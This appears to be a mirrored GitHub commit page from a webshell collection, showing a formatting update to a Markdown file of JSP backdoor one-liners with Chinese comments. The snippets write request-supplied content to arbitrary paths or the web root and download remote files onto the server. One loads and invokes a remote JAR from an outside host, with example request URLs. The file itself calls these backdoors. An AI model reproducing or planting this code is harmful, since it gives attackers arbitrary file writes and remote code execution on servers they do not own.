Mirrors/webshell
2
0
Fork 0
mirror of https://github.com/tennc/webshell synced 2024-11-21 18:53:03 +00:00
Code Issues Projects Releases Packages Wiki Activity

Update catjsp.md

Browse source
This commit is contained in:
tennc 2014-12-19 17:17:55 +08:00
parent a09547db35
commit 04bb4ea2eb
1 changed files with 12 additions and 9 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

21
jsp/cat/catjsp.md
View file

@ -1,30 +1,35 @@
###把字符串编码后写入指定文件的:
1.1
````<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>````
<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>
请求http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
写入web目录
1.2
````<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>````
<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>
请求http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
2.1
````<%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>````
<%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
请求http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
写入web目录:
2.2
````<%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>````
<%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
请求http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
###下载远程文件(不用apache io utils的话没办法把inputstream转byte,所以很长…)
<%
java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();
byte[] b = new byte[1024];
@ -40,7 +45,6 @@
下载到web路径:
<%
java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();
byte[] b = new byte[1024];
@ -58,7 +62,6 @@
如果嫌弃上面的后门功能太弱太陈旧可以试试这个:
<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new Object[]{request.getParameterMap()})%>
请求http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar&023=A